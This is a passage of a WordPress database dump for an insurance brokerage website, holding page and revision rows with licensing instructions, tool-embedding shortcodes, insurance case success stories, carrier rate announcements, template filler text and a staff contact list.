15:51:51','2015-06-23 15:51:51','','Case Status','','inherit','open','open','','303-revision-v1','','','2015-06-23 15:51:51','2015-06-23 15:51:51','',303,'http://www.empireins.com/303-revision-v1/',0,'revision','',0),(305,1,'2015-06-23 15:52:13','2015-06-23 15:52:13','[sso-broker-gear] ','Case Status','','inherit','open','open','','303-revision-v1','','','2015-06-23 15:52:13','2015-06-23 15:52:13','',303,'http://www.empireins.com/303-revision-v1/',0,'revision','',0),(306,1,'2015-06-24 14:08:26','2015-06-24 14:08:26','[sso-surelc]\r\n\r\n \r\n\r\n<strong>Contracting and Licensing</strong>\r\n\r\nIn our continued effort to help our producers do business more efficiently, EIB implemented SureLC, a new simplified contracting and appointment process which allows you to complete ONE set of paperwork to contract with ALL carriers you wish to represent. SureLC is free and provides a single repository to manage all aspects of your licensing and contracting needs. In addition to the time saved during the contracting process, SureLC also provides up-to-date licensing statuses for each state license you maintain.\r\n\r\nJust follow the below simple steps:\r\n\r\n \r\n\r\n<strong>First-time Contracting</strong>\r\n<ol>\r\n <li><span style=\"text-decoration: underline;\">Download</span> the SureLC Producer Set-Up Packet</li>\r\n <li>Complete and sign the forms at all designated areas</li>\r\n <li>Return the packet with your E&O and voided check to Chaya Klein (<a href=\"mailto:Chaya@empireins.com\">Chaya@empireins.com</a>) for processing</li>\r\n</ol>\r\n \r\n\r\n<strong>Requesting Additional Appointments</strong>\r\n<ol>\r\n <li>Head to the licensing tab on our website and press “Click to Continue”</li>\r\n <li>Enter your personal information and select the carrier you’d like to become appointed with</li>\r\n <li>Review the carrier contracting forms and select “Apply My Signature”</li>\r\n</ol>\r\n<strong>THAT’S IT! YOU’RE ALL DONE!! </strong>\r\n\r\n \r\n\r\nGot any questions? Reach out to our Licensing Specialist, Chaya Klein, and she will guide you through this very simple and effortless process.\r\n\r\n ','Licensing','','publish','open','open','','licensing-contracting','','','2016-03-03 21:27:25','2016-03-03 21:27:25','',0,'http://www.empireins.com/?page_id=306',0,'page','',0),(307,1,'2015-06-24 14:08:26','2015-06-24 14:08:26','[sso-surelc]','Licensing & Contracting','','inherit','open','open','','306-revision-v1','','','2015-06-24 14:08:26','2015-06-24 14:08:26','',306,'http://www.empireins.com/306-revision-v1/',0,'revision','',0),(309,1,'2015-06-30 02:54:37','2015-06-30 02:54:37','[webpipesso f=\"quotes_without_needs\" t=\"iframe\" width=\"100p\" height=\"1000\"]','Term Quotes','','publish','open','open','','term-quotes','','','2016-01-11 17:32:53','2016-01-11 17:32:53','',0,'http://www.empireins.com/?page_id=309',0,'page','',0),(310,1,'2015-06-30 02:54:37','2015-06-30 02:54:37','[webpipesso f=\"quotes_without_needs\" t=\"iframe\" width=\"100p\" height=\"1000\"]','Term Quotes','','inherit','open','open','','309-revision-v1','','','2015-06-30 02:54:37','2015-06-30 02:54:37','',309,'http://www.empireins.com/309-revision-v1/',0,'revision','',0),(311,1,'2015-06-30 02:56:18','2015-06-30 02:56:18','[webpipesso f=\"forms\" t=\"iframe\" width=\"100p\" height=\"2000\"]','Forms','','publish','open','closed','','forms','','','2016-01-11 17:35:16','2016-01-11 17:35:16','',0,'http://www.empireins.com/?page_id=311',0,'page','',0),(312,1,'2015-06-30 02:56:18','2015-06-30 02:56:18','[webpipesso f=\"forms\" t=\"iframe\" width=\"100p\" height=\"2000\"]','Forms','','inherit','open','open','','311-revision-v1','','','2015-06-30 02:56:18','2015-06-30 02:56:18','',311,'http://www.empireins.com/311-revision-v1/',0,'revision','',0),(313,1,'2015-06-30 02:57:05','2015-06-30 02:57:05','[webpipesso f=\"underwriting_search_engine\" t=\"iframe\" width=\"100p\" height=\"500\"]','Underwriting Search','','publish','open','open','','underwriting-search','','','2015-06-30 02:57:05','2015-06-30 02:57:05','',0,'http://www.empireins.com/?page_id=313',0,'page','',0),(314,1,'2015-06-30 02:57:05','2015-06-30 02:57:05','[webpipesso f=\"underwriting_search_engine\" t=\"iframe\" width=\"100p\" height=\"500\"]','Underwriting Search','','inherit','open','open','','313-revision-v1','','','2015-06-30 02:57:05','2015-06-30 02:57:05','',313,'http://www.empireins.com/313-revision-v1/',0,'revision','',0),(315,1,'2015-06-30 02:57:51','2015-06-30 02:57:51','[webpipesso f=\"product_information\" t=\"iframe\" width=\"100p\" height=\"500\"]','Life Product Search','','publish','open','open','','life-product-search','','','2015-06-30 02:57:51','2015-06-30 02:57:51','',0,'http://www.empireins.com/?page_id=315',0,'page','',0),(316,1,'2015-06-30 02:57:51','2015-06-30 02:57:51','[webpipesso f=\"product_information\" t=\"iframe\" width=\"100p\" height=\"500\"]','Life Product Search','','inherit','open','open','','315-revision-v1','','','2015-06-30 02:57:51','2015-06-30 02:57:51','',315,'http://www.empireins.com/315-revision-v1/',0,'revision','',0),(317,1,'2015-06-30 02:58:19','2015-06-30 02:58:19','[webpipesso f=\"annuity_product_search\" t=\"iframe\" width=\"100p\" height=\"500\"]','Annuity Product Search','','publish','open','open','','annuity-product-search','','','2015-06-30 02:58:19','2015-06-30 02:58:19','',0,'http://www.empireins.com/?page_id=317',0,'page','',0),(318,1,'2015-06-30 02:58:19','2015-06-30 02:58:19','[webpipesso f=\"annuity_product_search\" t=\"iframe\" width=\"100p\" height=\"500\"]','Annuity Product Search','','inherit','open','open','','317-revision-v1','','','2015-06-30 02:58:19','2015-06-30 02:58:19','',317,'http://www.empireins.com/317-revision-v1/',0,'revision','',0),(319,1,'2015-06-30 02:58:40','2015-06-30 02:58:40','[webpipesso f=\"iGO\" t=\"link\"]\r\n\r\n \r\n\r\n<img class=\"\" src=\"http://www.brokerscentral.com/wp-content/uploads/2015/01/550x100.jpg\" alt=\"\" width=\"391\" height=\"71\" />','iGo','','publish','open','open','','igo','','','2016-01-11 21:52:53','2016-01-11 21:52:53','',0,'http://www.empireins.com/?page_id=319',0,'page','',0),(320,1,'2015-06-30 02:58:40','2015-06-30 02:58:40','[webpipesso f=\"iGO\" t=\"link\"]','iGo','','inherit','open','open','','319-revision-v1','','','2015-06-30 02:58:40','2015-06-30 02:58:40','',319,'http://www.empireins.com/319-revision-v1/',0,'revision','',0),(322,1,'2015-07-25 14:37:08','2015-07-25 14:37:08','<div class=\"about-sub-content\">\r\n\r\nWelcome to EIB, where Life Solutions are Beyond Expectations!\r\n\r\n</div>\r\n<div class=\"about-content\">As the industry leader in insurance brokerage, we take great pride in providing brokers with the ultimate products needed to exceed their clients’ expectations. With EIB’s renowned attention to detail, and extensive resources you can be confident you will receive the very best policy package for each and every one of your clients.</div>\r\n<div class=\"about-content\">\r\nBy joining EIB you reap the benefits of our extensive experience and the strong relationships we have built with all major carriers and underwriters.</div>\r\n<div class=\"about-content\">\r\nAs an EIB broker, you will have access to the very latest developments in the industry by way of our constant research; whether it is the hottest products, latest news, or most competitive prices in the insurance field.</div>\r\n<div class=\"about-content\">\r\nIt is a privilege to have you here.</div>','Home','','inherit','open','open','','6-revision-v1','','','2015-07-25 14:37:08','2015-07-25 14:37:08','',6,'http://www.empireins.com/6-revision-v1/',0,'revision','',0),(323,1,'2015-07-25 14:37:36','2015-07-25 14:37:36','<div class=\"about-sub-content\">\r\n\r\nWelcome to EIB, where Life Solutions are Beyond Expectations!\r\n\r\n</div>\r\n<div class=\"about-content\">As the industry leader in insurance brokerage, we take great pride in providing brokers with the ultimate products needed to exceed their clients’ expectations. With EIB’s renowned attention to detail, and extensive resources you can be confident you will receive the very best policy package for each and every one of your clients.</div>\r\n<div class=\"about-content\"></div>\r\n<div class=\"about-content\">By joining EIB you reap the benefits of our extensive experience and the strong relationships we have built with all major carriers and underwriters.</div>\r\n<div class=\"about-content\"></div>\r\n<div class=\"about-content\">As an EIB broker, you will have access to the very latest developments in the industry by way of our constant research; whether it is the hottest products, latest news, or most competitive prices in the insurance field.</div>\r\n<div class=\"about-content\"></div>\r\n<div class=\"about-content\">It is a privilege to have you here.</div>','Home','','inherit','open','open','','6-revision-v1','','','2015-07-25 14:37:36','2015-07-25 14:37:36','',6,'http://www.empireins.com/6-revision-v1/',0,'revision','',0),(324,1,'2015-07-25 14:41:00','2015-07-25 14:41:00','<div class=\"about-sub-content\">\r\n\r\nWelcome to EIB, where Life Solutions are Beyond Expectations!\r\n\r\n</div>\r\n<div class=\"about-content\"><p>As the industry leader in insurance brokerage, we take great pride in providing brokers with the ultimate products needed to exceed their clients’ expectations. With EIB’s renowned attention to detail, and extensive resources you can be confident you will receive the very best policy package for each and every one of your clients.</div></p>\r\n\r\n<div class=\"about-content\"></div>\r\n<div class=\"about-content\"><p>By joining EIB you reap the benefits of our extensive experience and the strong relationships we have built with all major carriers and underwriters.</div>\r\n<div class=\"about-content\"></div></p>\r\n\r\n<div class=\"about-content\"><p>As an EIB broker, you will have access to the very latest developments in the industry by way of our constant research; whether it is the hottest products, latest news, or most competitive prices in the insurance field.</div></p>\r\n<div class=\"about-content\"></div>\r\n<div class=\"about-content\"><p>It is a privilege to have you here.</div></p>','Home','','inherit','open','open','','6-revision-v1','','','2015-07-25 14:41:00','2015-07-25 14:41:00','',6,'http://www.empireins.com/6-revision-v1/',0,'revision','',0),(325,1,'2015-07-25 14:44:58','2015-07-25 14:44:58','<div class=\"page-post-sub-content\">As the industry leader in insurance brokerage, we take great pride in providing brokers with the ultimate products needed to exceed their clients’ expectations. With EIB’s renowned attention to detail, and extensive resources you can be confident you will receive the very best policy package for each and every one of your clients. By joining EIB you reap the benefits of our extensive experience and the strong relationships we have built with all major carriers and underwriters.</div>\r\n<div class=\"page-post-sub-content\"></div>\r\n<div class=\"page-post-sub-content\">As an EIB broker, you will have access to the very latest developments in the industry by way of our constant research; whether it is the hottest products, latest news, or most competitive prices in the insurance field. Furthermore, you can follow your policy as it gets approved and issued, by visiting your customized portal on our website.</div>\r\n<div class=\"page-post-sub-content\"></div>\r\n<div class=\"page-post-sub-content\">Please feel free to contact us via email or give us a call at 718.218.9647.</div>\r\n<div class=\"page-post-sub-content\"></div>\r\n<div class=\"page-post-sub-content\">It is a privilege to have you here. …Welcome…</div>\r\n<div class=\"page-post-sub-content\"></div>\r\n<div class=\"page-post-sub-content\">David Braver CEO & President</div>','about us','','inherit','open','open','','9-revision-v1','','','2015-07-25 14:44:58','2015-07-25 14:44:58','',9,'http://www.empireins.com/9-revision-v1/',0,'revision','',0),(326,1,'2015-07-25 14:46:28','2015-07-25 14:46:28','<div class=\"about-sub-content\">\r\n<h1>Welcome to EIB, where Life Solutions are Beyond Expectations!</h1>\r\n</div>\r\n<div class=\"about-content\">\r\n\r\nAs the industry leader in insurance brokerage, we take great pride in providing brokers with the ultimate products needed to exceed their clients’ expectations. With EIB’s renowned attention to detail, and extensive resources you can be confident you will receive the very best policy package for each and every one of your clients.\r\n\r\n</div>\r\n<div class=\"about-content\"></div>\r\n<div class=\"about-content\">\r\n\r\nBy joining EIB you reap the benefits of our extensive experience and the strong relationships we have built with all major carriers and underwriters.\r\n\r\n</div>\r\n<div class=\"about-content\"></div>\r\n<div class=\"about-content\">\r\n\r\nAs an EIB broker, you will have access to the very latest developments in the industry by way of our constant research; whether it is the hottest products, latest news, or most competitive prices in the insurance field.\r\n\r\n</div>\r\n<div class=\"about-content\"></div>\r\n<div class=\"about-content\">\r\n\r\nIt is a privilege to have you here.\r\n\r\n</div>','Home','','inherit','open','open','','6-revision-v1','','','2015-07-25 14:46:28','2015-07-25 14:46:28','',6,'http://www.empireins.com/6-revision-v1/',0,'revision','',0),(327,1,'2015-07-25 14:52:01','2015-07-25 14:52:01','<div class=\"entry-content\">\r\n\r\n<strong>Companion’s Chronic Illness Rider, available at ALL underwriting classes, is a natural fit for clients who can’t qualify for traditional Long-Term Care insurance coverage based on a few dings and dents in their health history. In this Case Success Story, Mutual of Omaha earns $77K of Target Premium using this unique element of their Chronic Illness Rider.\r\n</strong>\r\n\r\n<hr />\r\n\r\n<h2 style=\"font-weight: 500;\"><strong>AT A GLANCE:</strong></h2>\r\n<h4 style=\"font-weight: 500;\">Product: GUL with Chronic Illness ABR\r\nTarget: $77,454</h4>\r\n<h4 style=\"font-weight: 500;\">Situation:</h4>\r\n<ul>\r\n <li>An EIB Producer had a female client, age 63, with a life insurance need of $5MM.</li>\r\n <li>The client was also seeking Long-Term Care coverage in addition to the death benefit.</li>\r\n <li>Unfortunately, the client had been declined for the LTC coverage based on the morbidity underwriting that accompanies Long-Term Care Riders.</li>\r\n</ul>\r\n<h4 style=\"font-weight: 500;\">Solution:</h4>\r\n<ul>\r\n <li>Companion Life GUL with Chronic Illness ABR</li>\r\n</ul>\r\n<h4 style=\"font-weight: 500;\">Results:</h4>\r\n<ul>\r\n <li>EIB illustrated the Companion Life GUL with a level pay design guaranteeing the death benefit out to age 120.</li>\r\n <li>Companion\'s GUL automatically includes the Accelerated Death Benefit riders at no additional cost and no table rating restrictions.</li>\r\n <li>The client can now enjoy the ADB rider coverage even though she was not approved for Long-Term Care coverage with other carriers.</li>\r\n <li>Companion allows acceleration of up to $1MM of coverage, one of the highest total benefit amounts in the industry.</li>\r\n <li>Companion’s acceleration cap of 80% of face amount is also one of the highest in the industry for this type of rider.</li>\r\n <li>$77,454 of target placed with Companion Life</li>\r\n</ul>\r\n<div class=\"entry-content\">\r\n\r\n<hr />\r\n\r\n</div>\r\n<div class=\"entry-content\" style=\"text-align: center;\"><strong><em>Real Clients. Real Cases. Real Success.</em></strong></div>\r\n</div>','Case Success: Companion Life Chronic Illness Rider Saves LTC Decline','','inherit','open','open','','290-revision-v1','','','2015-07-25 14:52:01','2015-07-25 14:52:01','',290,'http://www.empireins.com/290-revision-v1/',0,'revision','',0),(328,1,'2015-07-25 14:52:22','2015-07-25 14:52:22','<div class=\"entry-content\">\r\n<p style=\"text-align: justify;\"><strong>Companion’s Chronic Illness Rider, available at ALL underwriting classes, is a natural fit for clients who can’t qualify for traditional Long-Term Care insurance coverage based on a few dings and dents in their health history. In this Case Success Story, Companion Life earns $77K of Target Premium using this unique element of their Chronic Illness Rider.\r\n</strong></p>\r\n\r\n\r\n<hr />\r\n\r\n<h2 style=\"font-weight: 500;\"><strong>AT A GLANCE:</strong></h2>\r\n<h4 style=\"font-weight: 500;\">Product: GUL with Chronic Illness ABR\r\nTarget: $77,454</h4>\r\n<h4 style=\"font-weight: 500;\">Situation:</h4>\r\n<ul>\r\n <li>An EIB Producer had a female client, age 63, with a life insurance need of $5MM.</li>\r\n <li>The client was also seeking Long-Term Care coverage in addition to the death benefit.</li>\r\n <li>Unfortunately, the client had been declined for the LTC coverage based on the morbidity underwriting that accompanies Long-Term Care Riders.</li>\r\n</ul>\r\n<h4 style=\"font-weight: 500;\">Solution:</h4>\r\n<ul>\r\n <li>Companion Life GUL with Chronic Illness ABR</li>\r\n</ul>\r\n<h4 style=\"font-weight: 500;\">Results:</h4>\r\n<ul>\r\n <li>EIB illustrated the Companion Life GUL with a level pay design guaranteeing the death benefit out to age 120.</li>\r\n <li>Companion\'s GUL automatically includes the Accelerated Death Benefit riders at no additional cost and no table rating restrictions.</li>\r\n <li>The client can now enjoy the ADB rider coverage even though she was not approved for Long-Term Care coverage with other carriers.</li>\r\n <li>Companion allows acceleration of up to $1MM of coverage, one of the highest total benefit amounts in the industry.</li>\r\n <li>Companion’s acceleration cap of 80% of face amount is also one of the highest in the industry for this type of rider.</li>\r\n <li>$77,454 of target placed with Companion Life</li>\r\n</ul>\r\n<div class=\"entry-content\">\r\n\r\n<hr />\r\n\r\n</div>\r\n<div class=\"entry-content\" style=\"text-align: center;\"><strong><em>Real Clients. Real Cases. Real Success.</em></strong></div>\r\n</div>','Case Success: Companion Life Chronic Illness Rider Saves LTC Decline','','inherit','open','open','','290-revision-v1','','','2015-07-25 14:52:22','2015-07-25 14:52:22','',290,'http://www.empireins.com/290-revision-v1/',0,'revision','',0),(329,1,'2015-07-25 14:53:09','2015-07-25 14:53:09','<p style=\"text-align: justify;\">2015 is shaping up to be another “Term War” and AIG has pulled out the big guns: Lower premiums, re-entering the New York market and their continued dominance of the rated term market. If you are looking for a great way to compete for term cases and expand into new markets, AIG is going to be a great partner in 2015.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h3>AIG Releases New Term Rates and Re-enters New York!</h3>\r\nEffective Monday, February 09, 2015, AIG is pleased to announce significant, competitive improvements nationwide on AG Select-a-Term. AIG ranks in the top three in the industry in nearly 75% of cells, with nearly 30% of their premium rates ranking number one. Plus, AIG has re-entered the New York term market with the same low rates. In the New York term market, nearly 90% of the time, AIG ranks in the top 3, and almost half of the time, AIG ranks number one.\r\n\r\n<strong>Changes:</strong>\r\n<ul>\r\n <li>Significant competitive improvements</li>\r\n <li>Approximately 30% of pricing cells changed:</li>\r\n <li>25% of the cells had a price decrease</li>\r\n <li>Decreases ranged from 0.1% to 25%; approximately 4% reduction on average</li>\r\n <li>Standard Nontobaco class comprised nearly half of the cells with a rate reduction</li>\r\n <li>Less than 7% of cells had an increase; approximately 5% increase on average</li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/02/AGLC106514REV0215_SAT_RateFlyer_FILLX.pdf\">Follow this link</a> to see how much prices have dropped versus the prior version of Select-A-Term</li>\r\n <li>Even more important, <a href=\"http://www.empireins.com/wp-content/uploads/2015/02/AGLC104824_REV0215_SaT_RepriceComparison_2FILLX.pdf\" target=\"_blank\">follow this link</a> to see how the new pricing stacks up versus the competition</li>\r\n</ul>\r\n<strong>Transition Rules:</strong>\r\n<ul>\r\n <li>New rates will be issued automatically between Feb 9 – March 23 unless old premiums are specifically requested. The system will not provide them with the better rate. It needs to be specifically requested. After the transition period ends 3/23, then only new rates will be issued.</li>\r\n <li>New AG Select-a-Term rates will be available February 9, 2015.</li>\r\n <li>Applications received prior to February 9, 2015 will automatically receive old premium rates.</li>\r\n <li>Applications received February 9, 2015 but prior to March 23, 2015 will automatically receive new rates unless old premium rates are specifically requested.</li>\r\n <li>Applications received March 23, 2015 or later will automatically receive the new rates.</li>\r\n <li>Reissue requests to the new rates will not be honored.</li>\r\n <li>New applications submitted to replace existing inforce coverage with the new rates will not be honored within 90 days of the existing coverage going inforce.</li>\r\n <li><a href=\"https://estationsecure.americangeneral.com/SharedFilePile/Bulletins/2015Bulletins/14_063_SaT_Feb_2015\" target=\"_blank\">Follow this link for the official bulletin from AIG</a>.</li>\r\n</ul>\r\n<strong>Rated Cases:</strong>\r\n\r\nFor years, AIG has handled rated term cases better than just about every other carrier out there. Rather than base their ratings on their Standard class, they used a special class that offered significant savings versus Standard Rates. The end result is pricing on rated cases that is some of the lowest in the industry. The best news? That pricing strategy continues with this re-price, including New York, giving us all yet another reason to direct term business to AIG. For more information on ratings and how AIG’s pricing stacks up, <a href=\"http://www.empireins.com/wp-content/uploads/2015/02/AGLC103795_REV0215_SAT_RatedTerm_FILLX.pdf\" target=\"_blank\">follow this link</a>.','AIG Releases New Term Rates and Re-enters NY!','','inherit','open','open','','283-revision-v1','','','2015-07-25 14:53:09','2015-07-25 14:53:09','',283,'http://www.empireins.com/283-revision-v1/',0,'revision','',0),(331,1,'2015-07-25 14:58:30','2015-07-25 14:58:30','<header class=\"entry-header\">\r\n<p class=\"entry-title\" style=\"font-weight: 500; color: #555555; text-align: justify;\"><strong>Experience matters. In this case, it led to the recognition of the subtle differences between operational protocols on an aviation case. The result? A win for the AIN Member and Voya to the tune of $219K in Target Premium, unlocked by the Voya Underwriter’s experience and relationships.</strong></p>\r\n\r\n</header>\r\n<div class=\"entry-content\">\r\n\r\n<hr />\r\n\r\n<h4 style=\"font-weight: 500;\"><strong>AT A GLANCE:</strong></h4>\r\n<h4 style=\"font-weight: 500;\">Underwriting: Aviation\r\nTarget: $218,908</h4>\r\n<h4 style=\"font-weight: 500;\">Situation:</h4>\r\n<ul>\r\n <li>A 60-year-old male was looking for $5MM of estate planning coverage and $3MM of Business Succession coverage.</li>\r\n <li>The insured applied at several insurance companies and had received flat extras due to his well documented business aviation activities.</li>\r\n</ul>\r\n<h4 style=\"font-weight: 500;\">Solution:</h4>\r\n<ul>\r\n <li>The Voya Financial Underwriting Team</li>\r\n</ul>\r\n<h4 style=\"font-weight: 500;\">Results:</h4>\r\n<ul>\r\n <li>The producer reached out to EIB for assistance as they could not sell a policy with a flat extra.</li>\r\n <li>Upon receipt of the aviation supplement, EIB had several questions to get more clarity on his aviation activities.</li>\r\n <li>Fortunately, we were able to uncover several favorable elements of his aviation activities, including: Typical aviation cases involve planes that are maintained under Part 91 – General Operating and Flight Rules versus Part 135 – Operating Requirements: Commuter and On Demand Operations – which is significantly more stringent.\r\n<ul>\r\n <li>He only flies within the US</li>\r\n <li>The type of jet that he flies</li>\r\n <li>The fact that he flies for business with a co-pilot, a retired Delta Pilot.</li>\r\n <li>The fact that he owns the plane but leases it back to a charter company.</li>\r\n <li>The charter company then provides daily maintenance on the plane as part of their agreement that is “Part 135 Certified”.</li>\r\n</ul>\r\n</li>\r\n <li>Upon receiving the additional information EIB called their underwriter at Voya, as the Voya product could satisfy the insurance needs of the client.</li>\r\n <li>Voya had an internal guideline of a $.48 flat extra, but were confident they could get the reinsurers on board with no flat extra.</li>\r\n <li>Through their contacts Voya was able to negotiate a Standard offer with no flat extra through the reinsurers.</li>\r\n <li>Voya’s reinsurance relationships allowed Voya to win the case and $218,908 in target premium.</li>\r\n</ul>\r\n\r\n<hr />\r\n<p class=\"entry-content\" style=\"text-align: center;\"><strong><em>Real Clients. Real Cases. Real Success.</em></strong></p>\r\n\r\n</div>','Case Success: Voya Turns Aviation Case into the “Friendly Skies” for $218K of Target','','inherit','open','open','','288-revision-v1','','','2015-07-25 14:58:30','2015-07-25 14:58:30','',288,'http://www.empireins.com/288-revision-v1/',0,'revision','',0),(332,1,'2015-07-25 14:59:47','2015-07-25 14:59:47','<p style=\"text-align: justify;\">Change is coming in the John Hancock Long-Term Care Portfolio. Effective April 27, 2015, they will no longer offer the New York Partnership Custom Care III. Read on for the transition rules, as well as a reminder of the LTC products that remain for sale in New York, including the LTC Rider available on many of their life insurance policies.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h2>John Hancock to Discontinue the Sale of its New York Partnership LTCI Product</h2>\r\nFrom John Hancock:\r\n<p style=\"padding-left: 30px;\"><em>John Hancock regularly monitors our long-term care insurance product portfolio to ensure that it continues to meet the needs of our customers and distributors. After a thorough analysis of our</em></p>\r\n<p style=\"padding-left: 30px;\"><em>New York long-term care insurance business, we have made the difficult decision to discontinue sales of our New York Partnership individual long-term care insurance policies (Policy Forms: LTC-11 NYP and LTC-11 SGNYP) effective April 27th, 2015. Our LTC product portfolio is moving in a different direction than New York Partnership product requirements allow.</em></p>\r\n<p style=\"padding-left: 30px;\"><em>We will continue to market our non-Partnership product, Custom Care III featuring Benefit Builder (Policy Forms LTC-11 NY and SG-11 NY), in New York. We commend and appreciate the dedication, work and advocacy of the New York Partnership staff as it relates to New York Partnership policyholders. We also remain committed to working with the New York Partnership and industry on matters that are important to our policyholders.</em></p>\r\n<strong>Transition Rules:</strong>\r\n<ul>\r\n <li>All individual long-term care insurance applications for New York Partnership policies must be signed by April 27th, 2015 and received in the Home Office by May 4th, 2015.</li>\r\n <li>Any New York Partnership applications received after May 4th, 2015 will not be processed.</li>\r\n</ul>\r\n<strong>Important:</strong>\r\n<ul>\r\n <li>These changes have no impact on existing, in force NY Partnership policies.</li>\r\n <li>There is no change to the LTC Rider available on many John Hancock Life Insurance policies at this time.</li>\r\n <li>Expect a new LTC product from John Hancock to be announced in the near future.</li>\r\n <li>Please see the <a href=\"http://www.empireins.com/wp-content/uploads/2015/02/LTCNewslink_NYP_Disc.pdf\" target=\"_blank\">formal announcement from John Hancock</a> for additional details.</li>\r\n</ul>','ProdMod: John Hancock is Discontinuing Sale of NY Partnership Custom Care III LTC Product','','inherit','open','open','','277-revision-v1','','','2015-07-25 14:59:47','2015-07-25 14:59:47','',277,'http://www.empireins.com/277-revision-v1/',0,'revision','',0),(335,1,'2015-07-25 15:10:03','2015-07-25 15:10:03','<div class=\"page-post-sub-content\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.</div>\r\n<div class=\"about-content\">\r\n\r\nCurabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n<h1>H1 - Donec interdum vestibulum est</h1>\r\n<h2>H2 - Donec interdum vestibulum est</h2>\r\n<h3>H2 - Donec interdum vestibulum est</h3>\r\n<h4>H2 - Donec interdum vestibulum est</h4>\r\nIntro text to the company Proin consequat erat ac urna iaculis rutrum ut sit amet dui. Aliquam sed ligula diam, et laoreet odio.\r\n<ul>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n</ul>\r\nNunc imperdiet ipsum quis purus porta sagittis ac sed arcu. Nulla placerat urna vestibulum elit sodales utimperdiet felis lobortis. Cras ornare luctus elit, at rhoncus ipsum rhoncus at. Lorem ipsum dolor sit amet, consecteturadipiscing elit. Integer quis feugiat nulla. Sed sem sapien, sollicitudin vitae lobortis a, consectetur nec nunc. Nunc congue felis at lorem ultricies aliquam. Quisque at leo in mi vulputate feugiat et eu magna.\r\n<p class=\"left-pragraph\">Curabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. . Donec eget ipsum nunc, in pharetra purus. Mauris eget laoPellentesque habitant morbi tristique seneestas.</p>\r\n\r\n<blockquote>Lorem ipsum dolor sit amet, consectetur adipiscing elit.</blockquote>\r\nClass aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n\r\n</div>','Licensing: Original','','inherit','open','open','','183-revision-v1','','','2015-07-25 15:10:03','2015-07-25 15:10:03','',183,'http://www.empireins.com/183-revision-v1/',0,'revision','',0),(336,1,'2015-07-25 15:10:52','2015-07-25 15:10:52',' ','','','publish','open','open','','336','','','2015-12-11 09:02:53','2015-12-11 09:02:53','',0,'http://www.empireins.com/?p=336',4,'nav_menu_item','',0),(337,1,'2015-07-25 15:11:09','2015-07-25 15:11:09','[sso-surelc]','Licensing','','inherit','open','open','','306-revision-v1','','','2015-07-25 15:11:09','2015-07-25 15:11:09','',306,'http://www.empireins.com/306-revision-v1/',0,'revision','',0),(341,1,'2015-07-25 15:29:55','2015-07-25 15:29:55','Etiam quis erat sit amet velit malesuada posuere. Phasellus nulla libero, porta vel nibh vel, pellentesque gravida mi.','iGo','','inherit','open','open','','47-autosave-v1','','','2015-07-25 15:29:55','2015-07-25 15:29:55','',47,'http://www.empireins.com/47-autosave-v1/',0,'revision','',0),(342,1,'2015-07-25 15:35:02','2015-07-25 15:35:02','','Product Illustrations','','inherit','open','open','','253-autosave-v1','','','2015-07-25 15:35:02','2015-07-25 15:35:02','',253,'http://www.empireins.com/253-autosave-v1/',0,'revision','',0),(343,1,'2015-07-25 15:39:04','2015-07-25 15:39:04','','Underwriting Tools','','publish','closed','closed','','underwriting-tools','','','2015-12-29 11:53:46','2015-12-29 11:53:46','',0,'http://www.empireins.com/?post_type=agent_tools&p=343',4,'agent_tools','',0),(344,1,'2015-07-25 15:42:41','2015-07-25 15:42:41','','Forms and iGo','','publish','closed','closed','','forms-and-igo','','','2016-01-06 18:11:31','2016-01-06 18:11:31','',0,'http://www.empireins.com/?post_type=agent_tools&p=344',1,'agent_tools','',0),(345,1,'2015-07-25 15:44:47','2015-07-25 15:44:47','','Case Status','','publish','closed','closed','','case-status','','','2015-12-29 11:20:21','2015-12-29 11:20:21','',0,'http://www.empireins.com/?post_type=agent_tools&p=345',0,'agent_tools','',0),(347,1,'2015-07-25 15:58:41','2015-07-25 15:58:41','<hr />\r\n\r\n<h4 style=\"text-align: justify;\">David Braver - CEO and President</h4>\r\n<p style=\"text-align: justify;\">P: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 204 | <a href=\"mailto:david@empireins.com\">david@empireins.com</a></p>\r\n<p style=\"padding-left: 30px;\">More than a decade ago, Mr. David Braver recognized the community’s need for a trusted, elite, umbrella insurance brokerage firm. Initially founded as a family business, EIB has since flourished while maintaining its core honesty, integrity and warmth. David’s expertise has earned him the respect of underwriters and enabled him to create a highly reputable business where clients know they will receive the very best insurance coverage for their specific needs. Extensive research is conducted before EIB considers a relationship with any carrier, and more than thirty carriers are currently contracted with EIB. Since the founding of the company, many agents have counted on the wisdom of Mr. David Braver; to help them protect their clients’ assets and families.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Gitty Braver - Controller</h4>\r\n<p style=\"text-align: justify;\">P: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 202 | <a href=\"mailto:gitty@empireins.com\">gitty@empireins.com</a></p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Cheskel Braver - Sales and Marketing Director</h4>\r\n<p style=\"text-align: justify;\">P: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 207 | <a href=\"mailto:cheskel@empireins.com\">cheskel@empireins.com</a></p>\r\n<p style=\"text-align: justify; padding-left: 